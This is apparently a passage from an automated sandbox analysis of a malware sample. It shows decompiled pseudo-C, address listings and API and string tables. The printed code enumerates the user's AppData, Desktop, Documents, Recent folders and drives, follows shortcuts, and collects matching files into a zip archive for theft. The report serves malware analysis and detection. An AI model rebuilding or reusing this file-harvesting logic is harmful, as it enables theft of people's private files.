								 *0x29dd8814 = 0x80000;
								goto L69;
							}
							if(_t277 == 1) {
								_t465 = _t441[1];
								 *0x29dd86b0 = E29D8E390(_t465);
								__eflags = _t465;
								if(_t465 != 0) {
									E29D8E4A0(_t465);
								}
								goto L68;
							}
							 *0x29dd86b0 = 0x80000;
						}
						goto L69;
					}
					while(1) {
						_t287 = GetDriveTypeA(_t466);
						if(_v6496 == 0) {
							goto L39;
						}
						_t528 = _t287 - 2;
						if(_t287 != 2) {
							goto L39;
						}
						 *0x29dd85cc( &_v2388,  &_v1020);
						_t304 = E29DA4650( &_v2388, "%DRIVE_REMOVABLE%", _t466);
						_t497 = _t497 + 8;
						_push(_t304);
						_push( &_v2388);
						L42:
						 *0x29dd85cc();
						_t376 = _v6492;
						E29D90820(_v6480, _t376,  &_v2388, _t440, _a24, _t528,  &_v2388, _v6488, _a20, _a8, _v6500);
						_t468 = _v6476;
						_t497 = _t497 + 0x14;
						_t296 = lstrlenA(_t468);
						_v6476 =  &(_t468[_t296 + 1]);
						if(_t468[_t296 + 1] != 0) {
							_t466 = _v6476;
							continue;
						}
						goto L45;
						L39:
						 *0x29dd85cc( &_v2388,  &_v1020);
						_t347 = StrStrA( &_v2388, "%DRIVE_FIXED%");
						_t291 =  &_v2388;
						__eflags = _t347;
						if(__eflags != 0) {
							_t470 = _t347 - _t291;
							 *0x29dd8498(0x29dd8830, _t291, _t470);
							_t349 = _t347 + 0xd;
							__eflags = _t349;
							_t142 = _t470 + 0x29dd8830; // 0x29dd8830
							_t299 = _t142;
							 *_t299 = 0;
							wsprintfA(_t299, "%s%s", _v6476, _t349);
							_t497 = _t497 + 0x10;
							_t291 = 0x29dd8830;
						}
						_push(_t291);
						_push( &_v2388);
						goto L42;
					}
				}
			}





















































































































                                        0x29d90896
                                        0x29d9089b
                                        0x29d908a0
                                        0x29d908a2
                                        0x29d908ac
                                        0x29d908c0
                                        0x29d908cf
                                        0x29d908d5
                                        0x29d908db
                                        0x29d908e1
                                        0x29d908f7
                                        0x29d9090d
                                        0x29d90921
                                        0x29d9092f
                                        0x29d90941
                                        0x29d90958
                                        0x29d90966
                                        0x29d9096c
                                        0x29d90972
                                        0x29d909b4
                                        0x29d909c7
                                        0x29d909cc
                                        0x29d909fa
                                        0x29d909fd
                                        0x29d90a05
                                        0x29d90a09
                                        0x29d90a13
                                        0x29d90a1b
                                        0x29d90a26
                                        0x29d90a2c
                                        0x29d90a2c
                                        0x29d90a31
                                        0x29d90a31
                                        0x29d90a3d
                                        0x29d90a40
                                        0x29d90a46
                                        0x29d90a49
                                        0x29d90a0b
                                        0x29d90a0b
                                        0x29d90a0b
                                        0x29d90a56
                                        0x29d90a6a
                                        0x29d90a6f
                                        0x29d90aa1
                                        0x29d90aa9
                                        0x29d90aab
                                        0x29d90aad
                                        0x29d90ab5
                                        0x29d90abb
                                        0x29d90ac4
                                        0x29d90acf
                                        0x29d90acf
                                        0x29d90adb
                                        0x29d90ade
                                        0x29d90ae4
                                        0x29d90ae7
                                        0x29d90aec
                                        0x29d90aec
                                        0x29d90af6
                                        0x29d90b0a
                                        0x29d90b14
                                        0x29d90b1a
                                        0x29d90b20
                                        0x29d90b2a
                                        0x29d90b30
                                        0x29d90b37
                                        0x29d90b40
                                        0x29d90b40
                                        0x29d90b42
                                        0x29d90b43
                                        0x29d90b57
                                        0x29d90b6e
                                        0x29d90b71
                                        0x29d90b85
                                        0x29d90b89
                                        0x29d90b8e
                                        0x29d90b91
                                        0x29d90b99
                                        0x29d90b9f
                                        0x29d90b9b
                                        0x29d90b9b
                                        0x29d90b9b
                                        0x29d90bb3
                                        0x29d90bb7
                                        0x29d90bc1
                                        0x29d90bc9
                                        0x29d90bd4
                                        0x29d90bdf
                                        0x29d90bdf
                                        0x29d90beb
                                        0x29d90bee
                                        0x29d90bf4
                                        0x29d90bf7
                                        0x29d90bfc
                                        0x29d90bfc
                                        0x29d90bb9
                                        0x29d90bb9
                                        0x29d90bb9
                                        0x29d90c06
                                        0x29d90c17
                                        0x29d90c1f
                                        0x29d90c20
                                        0x29d90c25
                                        0x29d90c25
                                        0x29d90c2d
                                        0x29d90c33
                                        0x29d90c39
                                        0x29d90c46
                                        0x29d90c4e
                                        0x29d90c4f
                                        0x29d90c54
                                        0x29d90c54
                                        0x29d90c57
                                        0x29d90c5e
                                        0x29d90c64
                                        0x29d90c6a
                                        0x29d90c77
                                        0x29d90c7f
                                        0x29d90c80
                                        0x29d90c85
                                        0x29d90c85
                                        0x29d90c95
                                        0x29d90c9b
                                        0x29d90ca1
                                        0x29d90ca8
                                        0x29d90cad
                                        0x29d90cdc
                                        0x29d90ce4
                                        0x29d90ce6
                                        0x29d90cee
                                        0x29d90cf4
                                        0x29d90cfd
                                        0x29d90d08
                                        0x29d90d08
                                        0x29d90d14
                                        0x29d90d17
                                        0x29d90d1d
                                        0x29d90d20
                                        0x29d90d20
                                        0x29d90d2d
                                        0x29d90d41
                                        0x29d90d46
                                        0x29d90d78
                                        0x29d90d80
                                        0x29d90d82
                                        0x29d90d8a
                                        0x29d90d8e
                                        0x29d90d99
                                        0x29d90da4
                                        0x29d90da4
                                        0x29d90db0
                                        0x29d90db3
                                        0x29d90db9
                                        0x29d90dbc
                                        0x29d90dbc
                                        0x29d90dc9
                                        0x29d90ddd
                                        0x29d90de2
                                        0x29d90e14
                                        0x29d90e1c
                                        0x29d90e20
                                        0x29d90e2a
                                        0x29d90e32
                                        0x29d90e3d
                                        0x29d90e43
                                        0x29d90e43
                                        0x29d90e48
                                        0x29d90e48
                                        0x29d90e54
                                        0x29d90e57
                                        0x29d90e5d
                                        0x29d90e60
                                        0x29d90e22
                                        0x29d90e22
                                        0x29d90e22
                                        0x29d90e6d
                                        0x29d90e81
                                        0x29d90e86
                                        0x29d90eb8
                                        0x29d90ec0
                                        0x29d90ec2
                                        0x29d90eca
                                        0x29d90ed0
                                        0x29d90ed9
                                        0x29d90ee4
                                        0x29d90ee4
                                        0x29d90ef0
                                        0x29d90ef3
                                        0x29d90ef9
                                        0x29d90efc
                                        0x29d90efc
                                        0x29d90f09
                                        0x29d90f0f
                                        0x29d90f11
                                        0x29d90f1c
                                        0x29d90f2a
                                        0x29d90f2c
                                        0x29d90f2c
                                        0x29d90f32
                                        0x29d90f34
                                        0x29d90f3f
                                        0x29d90f48
                                        0x29d90f4a
                                        0x29d90f50
                                        0x29d90f50
                                        0x29d90f56
                                        0x29d90f64
                                        0x29d90f6e
                                        0x29d90f70
                                        0x29d90f79
                                        0x29d910f0
                                        0x29d910f6
                                        0x29d910f8
                                        0x29d910fd
                                        0x00000000
                                        0x29d90f7f
                                        0x29d90f88
                                        0x29d90f95
                                        0x29d90f9b
                                        0x29d90fa1
                                        0x29d91100
                                        0x29d91100
                                        0x29d9110d
                                        0x29d9111b
                                        0x29d9111e
                                        0x29d91138
                                        0x29d9113b
                                        0x29d9113f
                                        0x29d91143
                                        0x29d91143
                                        0x29d91148
                                        0x29d9114f
                                        0x29d91156
                                        0x29d91156
                                        0x29d9115b
                                        0x29d9115f
                                        0x29d91162
                                        0x29d91120
                                        0x29d91120
                                        0x29d91126
                                        0x29d9112c
                                        0x29d9112c
                                        0x29d9110f
                                        0x29d9110f
                                        0x29d91111
                                        0x29d91113
                                        0x29d91113
                                        0x29d91167
                                        0x29d9116f
                                        0x29d91179
                                        0x29d9117c
                                        0x29d9118a
                                        0x29d9119c
                                        0x29d9117e
                                        0x29d9117e
                                        0x29d9117e
                                        0x29d91171
                                        0x29d91171
                                        0x29d91171
                                        0x29d911a3
                                        0x29d911da
                                        0x29d911a5
                                        0x29d911a5
                                        0x29d911af
                                        0x29d911e2
                                        0x29d911e5
                                        0x29d911f3
                                        0x29d911fb
                                        0x29d91200
                                        0x29d91202
                                        0x29d91204
                                        0x29d91204
                                        0x29d91209
                                        0x29d91209
                                        0x29d9120a
                                        0x29d91212
                                        0x29d91215
                                        0x29d9121d
                                        0x29d9121e
                                        0x29d9121f
                                        0x29d9122d
                                        0x29d9122d
                                        0x29d911e7
                                        0x00000000
                                        0x29d911e7
                                        0x29d911b4
                                        0x29d911c2
                                        0x29d911ca
                                        0x29d911cf
                                        0x29d911d1
                                        0x29d911d3
                                        0x29d911d3
                                        0x00000000
                                        0x29d911d1
                                        0x29d911b6
                                        0x29d911b6
                                        0x00000000
                                        0x29d911a3
                                        0x29d90fb6
                                        0x29d90fb7
                                        0x29d90fc4
                                        0x00000000
                                        0x00000000
                                        0x29d90fc6
                                        0x29d90fc9
                                        0x00000000
                                        0x00000000
                                        0x29d90fd9
                                        0x29d90feb
                                        0x29d90ff0
                                        0x29d90ff3
                                        0x29d90ffa
                                        0x29d91072
                                        0x29d91072
                                        0x29d91097
                                        0x29d910a4
                                        0x29d910a9
                                        0x29d910af
                                        0x29d910b3
                                        0x29d910c2
                                        0x29d910c8
                                        0x29d90fb0
                                        0x00000000
                                        0x29d90fb0
                                        0x00000000
                                        0x29d90ffd
                                        0x29d9100b
                                        0x29d91023
                                        0x29d91025
                                        0x29d9102b
                                        0x29d9102d
                                        0x29d91031
                                        0x29d9103c
                                        0x29d91048
                                        0x29d91048
                                        0x29d9104d
                                        0x29d9104d
                                        0x29d91059
                                        0x29d9105c
                                        0x29d91062
                                        0x29d91065
                                        0x29d91065
                                        0x29d9106a
                                        0x29d91071
                                        0x00000000
                                        0x29d91071
                                        0x29d90fb6

                                        APIs
                                        • _memset.LIBCMT ref: 29D908E1
                                        • _memset.LIBCMT ref: 29D908F7
                                        • _memset.LIBCMT ref: 29D9090D
                                        • lstrcatA.KERNEL32(?,\Files\), ref: 29D90921
                                        • lstrcatA.KERNEL32(?,?), ref: 29D9092F
                                        • lstrcatA.KERNEL32(?,.zip), ref: 29D90941
                                        • _memset.LIBCMT ref: 29D90972
                                        • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 29D90986
                                          • Part of subcall function 29DA4650: StrStrA.SHLWAPI(?,?,000F4240,?,?,29D909A9,%APPDATA%,?), ref: 29DA465C
                                        • lstrcpy.KERNEL32(?,00000000), ref: 29D909B4
                                        • _memset.LIBCMT ref: 29D909C7
                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 29D909DB
                                        • StrStrA.SHLWAPI(?,%LOCALAPPDATA%), ref: 29D909FF
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90A26
                                        • wsprintfA.USER32 ref: 29D90A40
                                        • lstrcpy.KERNEL32(?,29DD8830), ref: 29D90A56
                                        • _memset.LIBCMT ref: 29D90A6A
                                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 29D90A81
                                        • StrStrA.SHLWAPI(?,%USERPROFILE%), ref: 29D90AA3
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90AC4
                                        • wsprintfA.USER32 ref: 29D90ADE
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90AF6
                                        • GetUserNameA.ADVAPI32 ref: 29D90B14
                                        • StrStrA.SHLWAPI(?,%DESKTOP%,?,?), ref: 29D90BAD
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000,?,?), ref: 29D90BD4
                                        • wsprintfA.USER32 ref: 29D90BEE
                                        • lstrcpy.KERNEL32(?,29DD8830), ref: 29D90C06
                                        • _memset.LIBCMT ref: 29D90CA8
                                        • SHGetFolderPathA.SHELL32(00000000,00000005,00000000,00000000,?), ref: 29D90CBC
                                        • StrStrA.SHLWAPI(?,%DOCUMENTS%), ref: 29D90CDE
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90CFD
                                        • wsprintfA.USER32 ref: 29D90D17
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90D2D
                                        • _memset.LIBCMT ref: 29D90D41
                                        • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 29D90D58
                                        • StrStrA.SHLWAPI(?,%PROGRAMFILES%), ref: 29D90D7A
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90D99
                                        • wsprintfA.USER32 ref: 29D90DB3
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90DC9
                                        • _memset.LIBCMT ref: 29D90DDD
                                        • SHGetFolderPathA.SHELL32(00000000,0000002A,00000000,00000000,?), ref: 29D90DF4
                                        • StrStrA.SHLWAPI(?,%PROGRAMFILES_86%), ref: 29D90E16
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90E3D
                                        • wsprintfA.USER32 ref: 29D90E57
                                        • lstrcpy.KERNEL32(?,29DD8830), ref: 29D90E6D
                                        • _memset.LIBCMT ref: 29D90E81
                                        • SHGetFolderPathA.SHELL32(00000000,00000008,00000000,00000000,?), ref: 29D90E98
                                        • StrStrA.SHLWAPI(?,%RECENT%), ref: 29D90EBA
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D90ED9
                                        • wsprintfA.USER32 ref: 29D90EF3
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90F09
                                        • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 29D90F88
                                        • GetDriveTypeA.KERNEL32(00000000), ref: 29D90FB7
                                        • lstrcpy.KERNEL32(?,?), ref: 29D90FD9
                                          • Part of subcall function 29DA4650: lstrcpyn.KERNEL32(29DD8830,?,00000000,00000000,?,29D909A9,%APPDATA%,?), ref: 29DA467A
                                          • Part of subcall function 29DA4650: wsprintfA.USER32 ref: 29DA46A6
                                          • Part of subcall function 29DAC130: UnmapViewOfFile.KERNEL32(?,?,00010000,29D911FB,?,?,00000003), ref: 29DAC155
                                          • Part of subcall function 29DAC130: CloseHandle.KERNEL32(?,?,00010000,29D911FB,?,?,00000003), ref: 29DAC166
                                          • Part of subcall function 29DAC130: CloseHandle.KERNEL32(?,?,00010000,29D911FB,?,?,00000003), ref: 29DAC17C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D9100B
                                        • StrStrA.SHLWAPI(?,%DRIVE_FIXED%), ref: 29D9101D
                                        • lstrcpyn.KERNEL32(29DD8830,?,00000000), ref: 29D9103C
                                        • wsprintfA.USER32 ref: 29D9105C
                                        • lstrcpy.KERNEL32(?,?), ref: 29D91072
                                        • lstrlenA.KERNEL32(?), ref: 29D910B3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$_memset$lstrcpynwsprintf$FolderPath$lstrcat$CloseDriveHandle$FileLogicalNameStringsTypeUnmapUserViewlstrlen
                                        • String ID: %APPDATA%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$%PROGRAMFILES%$%PROGRAMFILES_86%$%RECENT%$%USERPROFILE%$%s%s$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*$*%RECENT%*$.zip$C:\Users\$\Desktop\$\Files\
                                        • API String ID: 1088293546-3106983180
                                        • Opcode ID: 17935446cb6e854f9e3db0db89c683e5b729d7dff2fa961d38358056db579abb
                                        • Instruction ID: a96cee75714189811d719da863e7131c083ccc09e1a26b187491f67ec189eeca
                                        • Opcode Fuzzy Hash: 17935446cb6e854f9e3db0db89c683e5b729d7dff2fa961d38358056db579abb
                                        • Instruction Fuzzy Hash: EE42E372D40265ABD726AF54DC84FEA77B8EF48B04F0481ADE509A7240DB349B85DFB0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D90130 Relevance: 84.5, APIs: 45, Strings: 3, Instructions: 463stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 59%
                                        			E29D90130(intOrPtr _a4, char* _a8, int _a12, char* _a16, struct _WIN32_FIND_DATAA* _a20, intOrPtr _a24, CHAR* _a28, int _a32, int _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v1540;
				char _v1804;
				char _v2804;
				char _v7804;
				struct _WIN32_FIND_DATAA _v8124;
				intOrPtr _v8128;
				char* _v8132;
				int _v8136;
				int _v8140;
				char* _v8144;
				void* _v8148;
				int _v8152;
				char _v8156;
				CHAR* _v8160;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t127;
				void* _t132;
				void* _t141;
				int _t155;
				int _t170;
				intOrPtr _t171;
				int _t173;
				int _t178;
				CHAR* _t182;
				int _t187;
				intOrPtr _t188;
				CHAR* _t190;
				int _t191;
				int _t199;
				void* _t212;
				CHAR* _t215;
				intOrPtr* _t223;
				void* _t226;
				char* _t227;
				int _t253;
				int _t255;
				int _t257;
				intOrPtr _t277;
				CHAR* _t281;
				signed int _t282;
				void* _t283;
				void* _t285;
				void* _t287;
				int _t288;
				void* _t308;

				E29DBCDB0(0x1fdc);
				_t127 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t127 ^ _t282;
				_t227 = _a8;
				_t281 = _a28;
				_t279 = _a12;
				_v8128 = _a4;
				_v8144 = _t227;
				_v8140 = _t279;
				_v8132 = _a16;
				_v8160 = _t281;
				wsprintfA( &_v1804, "%s\\*", _t279);
				_t132 = FindFirstFileA( &_v1804,  &_v8124);
				_t259 =  &_v7804;
				_v8148 = _t132;
				E29DB5640( &_v7804, 0, 0x1388);
				_t285 = _t283 + 0x18;
				_t135 = lstrcatA( &_v7804, _t281);
				_v8136 = 0;
				if(_v8148 == 0xffffffff) {
					L57:
					return E29DADF46(_t135, _t227, _v8 ^ _t282, _t259, _t279, _t281);
				} else {
					goto L3;
					L4:
					_push("..");
					_push( &(_v8124.cFileName));
					if( *0x29dd8550() == 0) {
						goto L55;
					}
					_t141 = E29D8FFD0(_t279, 0x80000000);
					_t285 = _t285 + 4;
					if(_t141 == 0) {
						goto L55;
					}
					 *0x29dd85cc( &_v540, _t279);
					lstrcatA( &_v540, "\\");
					lstrcatA( &_v540,  &(_v8124.cFileName));
					_t279 = _a36;
					if(_t279 != 0) {
						L10:
						E29DB5640( &_v1540, 0, 0x3e8);
						E29DB5640( &_v2804, 0, 0x3e8);
						_t287 = _t285 + 0x18;
						_push(0x29dcd617);
						_push(_t227);
						if( *0x29dd8550() != 0) {
							wsprintfA( &_v2804, "%s\\%s", _t227,  &(_v8124.cFileName));
							_t285 = _t287 + 0x10;
						} else {
							wsprintfA( &_v2804, "%s",  &(_v8124.cFileName));
							_t285 = _t287 + 0xc;
						}
						if(lstrlenA( &_v7804) <= 3) {
							__eflags = _t279;
							if(_t279 == 0) {
								L58:
								_t155 = PathMatchSpecA( &(_v8124.cFileName), _v8132);
								__eflags = _t155;
								if(_t155 == 0) {
									goto L51;
								}
								 *0x29dd85cc( &_v276, _t227);
								lstrcatA( &_v276, "\\");
								_t259 =  &_v276;
								lstrcatA( &_v276,  &(_v8124.cFileName));
								_t281 = E29DB75A0(E29DA4E00( &_v540),  &_v276, 0x3e8, 0);
								__eflags = _a24 - _t281;
								if(_a24 <= _t281) {
									goto L51;
								}
								_t135 =  *0x29dd82e8; // 0xa028
								__eflags = _t135 -  *0x29dd82f4; // 0x0
								if(__eflags <= 0) {
									goto L57;
								}
								_t279 = _v8140;
								_t170 = E29D8FFD0(_v8140, 0xc0000000);
								_t285 = _t285 + 4;
								__eflags = _t170;
								if(_t170 != 0) {
									__eflags = _a32;
									_t171 = _v8128;
									if(_a32 == 0) {
										_push( &_v276);
									} else {
										_push( &_v540);
									}
									E29DAD330(_t171);
									_t285 = _t285 + 4;
									 *0x29dd82f4 =  &(_t281[ *0x29dd82f4]);
								}
								goto L51;
							}
							_t173 = PathMatchSpecA( &(_v8124.cFileName), "*.lnk");
							__eflags = _t173;
							if(_t173 == 0) {
								goto L58;
							}
							 *0x29dd8544(0);
							_t227 =  &_v1540;
							_t279 =  &_v540;
							E29D8FA90(_t227,  &_v540);
							 *0x29dd8528();
							_t178 = PathMatchSpecA(_t227, _v8132);
							__eflags = _t178;
							if(_t178 == 0) {
								L50:
								_t227 = _v8144;
								goto L51;
							}
							 *0x29dd85cc( &_v276, _v8144);
							lstrcatA( &_v276, "\\");
							_t182 = PathFindFileNameA(_t227);
							_t259 =  &_v276;
							lstrcatA( &_v276, _t182);
							_t281 = E29DB75A0(E29DA4E00(_t227),  &_v276, 0x3e8, 0);
							__eflags = _a24 - _t281;
							if(_a24 <= _t281) {
								goto L50;
							}
							_t135 =  *0x29dd82e8; // 0xa028
							__eflags = _t135 -  *0x29dd82f4; // 0x0
							if(__eflags <= 0) {
								goto L57;
							}
							_t279 = _v8140;
							_t187 = E29D8FFD0(_v8140, 0xc0000000);
							_t285 = _t285 + 4;
							__eflags = _t187;
							if(_t187 != 0) {
								__eflags = _a32;
								_t188 = _v8128;
								if(_a32 == 0) {
									_push( &_v276);
								} else {
									_push(_t227);
								}
								E29DAD330(_t188);
								_t285 = _t285 + 4;
								 *0x29dd82f4 =  &(_t281[ *0x29dd82f4]);
								__eflags =  *0x29dd82f4;
							}
							goto L50;
						} else {
							_t271 =  &_v7804;
							_t190 = E29DAEA8E(_t227,  &_v7804, _t279,  &_v7804, ":",  &_v8156);
							_t279 = 0;
							_t285 = _t285 + 0xc;
							_t281 = _t190;
							_v8136 = 0;
							if(_a36 != 0 && PathMatchSpecA( &(_v8124.cFileName), "*.lnk") != 0) {
								_v8152 = 1;
								 *0x29dd8544(0);
								E29D8FA90( &_v1540,  &_v540);
								 *0x29dd8528();
								_t279 = _v8152;
								_t227 = _v8144;
							}
							if(_t281 == 0) {
								L25:
								_push(_v8132);
								if(_t279 == 0) {
									_t191 = PathMatchSpecA( &(_v8124.cFileName));
									__eflags = _t191;
									if(_t191 == 0) {
										goto L51;
									}
									 *0x29dd85cc( &_v276, _t227);
									lstrcatA( &_v276, "\\");
									_t259 =  &(_v8124.cFileName);
									lstrcatA( &_v276,  &(_v8124.cFileName));
									_t281 = E29DB75A0(E29DA4E00( &_v540),  &(_v8124.cFileName), 0x3e8, 0);
									__eflags = _a24 - _t281;
									if(_a24 <= _t281) {
										goto L51;
									}
									_t253 =  *0x29dd82e8; // 0xa028
									__eflags = _t253 -  *0x29dd82f4; // 0x0
									if(__eflags <= 0) {
										goto L57;
									}
									_t279 = _v8140;
									_t199 = E29D8FFD0(_v8140, 0xc0000000);
									_t285 = _t285 + 4;
									__eflags = _t199;
									if(_t199 == 0) {
										goto L51;
									}
									__eflags = _a32;
									if(_a32 == 0) {
										L38:
										_push( &_v276);
										L39:
										E29DAD330(_v8128);
										_t285 = _t285 + 4;
										 *0x29dd82f4 =  &(_t281[ *0x29dd82f4]);
										goto L51;
									}
									_push( &_v540);
									goto L39;
								}
								if(PathMatchSpecA( &_v1540) == 0) {
									goto L51;
								}
								 *0x29dd85cc( &_v276, _t227);
								lstrcatA( &_v276, "\\");
								_t259 =  &_v1540;
								lstrcatA( &_v276, PathFindFileNameA( &_v1540));
								_t281 = E29DB75A0(E29DA4E00( &_v1540),  &_v1540, 0x3e8, 0);
								if(_a24 <= _t281) {
									goto L51;
								}
								_t255 =  *0x29dd82e8; // 0xa028
								_t308 = _t255 -  *0x29dd82f4; // 0x0
								if(_t308 <= 0) {
									goto L57;
								}
								_t279 = _v8140;
								_t212 = E29D8FFD0(_v8140, 0xc0000000);
								_t285 = _t285 + 4;
								if(_t212 == 0) {
									goto L51;
								}
								if(_a32 == 0) {
									goto L38;
								}
								_push( &_v1540);
								goto L39;
							} else {
								do {
									_push(0);
									_push(_t281);
									if(_t279 == 0) {
										_t271 =  &_v2804;
										_push( &_v2804);
									} else {
										_push( &_v1540);
									}
									if( *0x29dd8490() != 0) {
										_v8136 = 1;
									}
									_t215 = E29DAEA8E(_t227, _t271, _t279, 0, ":",  &_v8156);
									_t281 = _t215;
									_t285 = _t285 + 0xc;
								} while (_t281 != 0);
								if(_v8136 != _t215) {
									L51:
									_t259 = _a20;
									if(_a20 == 0) {
										goto L55;
									}
									_t156 = _a48;
									_t239 = _a44;
									if(_a48 > _a44) {
										L56:
										_t135 = FindClose(_v8148);
										goto L57;
									}
									if(_v8136 == 0) {
										E29D90130(_v8128,  &_v2804,  &_v540, _v8132, _t259, _a24, _v8160, _a32, _a36, _a40, _t239, _t156 + 1);
										_t285 = _t285 + 0x30;
									}
									goto L55;
								}
								goto L25;
							}
						}
					}
					_t288 = _t285 - 0x1c;
					_t257 = _t288;
					_t223 =  &_v540;
					 *((intOrPtr*)(_t257 + 0x14)) = 0xf;
					 *(_t257 + 0x10) = _t279;
					_v8152 = _t288;
					 *_t257 = 0;
					_t281 = _t223 + 1;
					do {
						_t277 =  *_t223;
						_t223 = _t223 + 1;
						_t294 = _t277;
					} while (_t277 != 0);
					E29D892C0(_t257,  &_v540, _t223 - _t281);
					_t226 = E29D8FBC0( &_v540, _t294);
					_t285 = _t288 + 0x1c;
					if(_t226 != 0) {
						goto L55;
					}
					goto L10;
					L55:
					_t259 =  &_v8124;
					if(FindNextFileA(_v8148,  &_v8124) != 0) {
						_t279 = _v8140;
						L3:
						_push(".");
						_push( &(_v8124.cFileName));
						if( *0x29dd8550() == 0) {
							goto L55;
						}
						goto L4;
					}
					goto L56;
				}
			}





















































                                        0x29d90138
                                        0x29d9013d
                                        0x29d90144
                                        0x29d9014e
                                        0x29d90152
                                        0x29d90156
                                        0x29d90166
                                        0x29d9016c
                                        0x29d90172
                                        0x29d90178
                                        0x29d9017e
                                        0x29d90184
                                        0x29d9019b
                                        0x29d901a6
                                        0x29d901af
                                        0x29d901b5
                                        0x29d901ba
                                        0x29d901c5
                                        0x29d901d2
                                        0x29d901dc
                                        0x29d9072b
                                        0x29d9073b
                                        0x29d901e2
                                        0x29d901e2
                                        0x29d90204
                                        0x29d90204
                                        0x29d9020f
                                        0x29d90218
                                        0x00000000
                                        0x00000000
                                        0x29d90223
                                        0x29d90228
                                        0x29d9022d
                                        0x00000000
                                        0x00000000
                                        0x29d9023b
                                        0x29d9024d
                                        0x29d90261
                                        0x29d90267
                                        0x29d9026c
                                        0x29d902b6
                                        0x29d902c4
                                        0x29d902da
                                        0x29d902df
                                        0x29d902e2
                                        0x29d902e7
                                        0x29d902f0
                                        0x29d90324
                                        0x29d9032a
                                        0x29d902f2
                                        0x29d90305
                                        0x29d9030b
                                        0x29d9030b
                                        0x29d9033d
                                        0x29d9059d
                                        0x29d9059f
                                        0x29d9073c
                                        0x29d9074a
                                        0x29d90750
                                        0x29d90752
                                        0x00000000
                                        0x00000000
                                        0x29d90760
                                        0x29d90772
                                        0x29d9077f
                                        0x29d90786
                                        0x29d907a5
                                        0x29d907a7
                                        0x29d907aa
                                        0x00000000
                                        0x00000000
                                        0x29d907b0
                                        0x29d907b5
                                        0x29d907bb
                                        0x00000000
                                        0x00000000
                                        0x29d907c1
                                        0x29d907cc
                                        0x29d907d1
                                        0x29d907d4
                                        0x29d907d6
                                        0x29d907dc
                                        0x29d907e0
                                        0x29d907e6
                                        0x29d907f7
                                        0x29d907e8
                                        0x29d907ee
                                        0x29d907ee
                                        0x29d907fe
                                        0x29d90803
                                        0x29d90806
                                        0x29d90806
                                        0x00000000
                                        0x29d907d6
                                        0x29d905b1
                                        0x29d905b7
                                        0x29d905b9
                                        0x00000000
                                        0x00000000
                                        0x29d905c1
                                        0x29d905c7
                                        0x29d905cd
                                        0x29d905d3
                                        0x29d905d8
                                        0x29d905e8
                                        0x29d905ee
                                        0x29d905f0
                                        0x29d906a3
                                        0x29d906a3
                                        0x00000000
                                        0x29d906a3
                                        0x29d90604
                                        0x29d90616
                                        0x29d9061f
                                        0x29d90626
                                        0x29d9062d
                                        0x29d90648
                                        0x29d9064a
                                        0x29d9064d
                                        0x00000000
                                        0x00000000
                                        0x29d9064f
                                        0x29d90654
                                        0x29d9065a
                                        0x00000000
                                        0x00000000
                                        0x29d90660
                                        0x29d9066b
                                        0x29d90670
                                        0x29d90673
                                        0x29d90675
                                        0x29d90677
                                        0x29d9067b
                                        0x29d90681
                                        0x29d9068e
                                        0x29d90683
                                        0x29d90685
                                        0x29d90685
                                        0x29d90695
                                        0x29d9069a
                                        0x29d9069d
                                        0x29d9069d
                                        0x29d9069d
                                        0x00000000
                                        0x29d90343
                                        0x29d9034a
                                        0x29d90356
                                        0x29d9035b
                                        0x29d9035d
                                        0x29d90360
                                        0x29d90362
                                        0x29d9036b
                                        0x29d90384
                                        0x29d9038e
                                        0x29d903a0
                                        0x29d903a5
                                        0x29d903ab
                                        0x29d903b1
                                        0x29d903b1
                                        0x29d903b9
                                        0x29d9040e
                                        0x29d90414
                                        0x29d90417
                                        0x29d904db
                                        0x29d904e1
                                        0x29d904e3
                                        0x00000000
                                        0x00000000
                                        0x29d904f1
                                        0x29d90503
                                        0x29d90509
                                        0x29d90517
                                        0x29d90536
                                        0x29d90538
                                        0x29d9053b
                                        0x00000000
                                        0x00000000
                                        0x29d90541
                                        0x29d90547
                                        0x29d9054d
                                        0x00000000
                                        0x00000000
                                        0x29d90553
                                        0x29d9055e
                                        0x29d90563
                                        0x29d90566
                                        0x29d90568
                                        0x00000000
                                        0x00000000
                                        0x29d9056e
                                        0x29d90578
                                        0x29d9057d
                                        0x29d90583
                                        0x29d90584
                                        0x29d9058a
                                        0x29d9058f
                                        0x29d90592
                                        0x00000000
                                        0x29d90592
                                        0x29d9057a
                                        0x00000000
                                        0x29d9057a
                                        0x29d9042c
                                        0x00000000
                                        0x00000000
                                        0x29d9043a
                                        0x29d9044c
                                        0x29d90452
                                        0x29d90467
                                        0x29d90486
                                        0x29d9048b
                                        0x00000000
                                        0x00000000
                                        0x29d90491
                                        0x29d90497
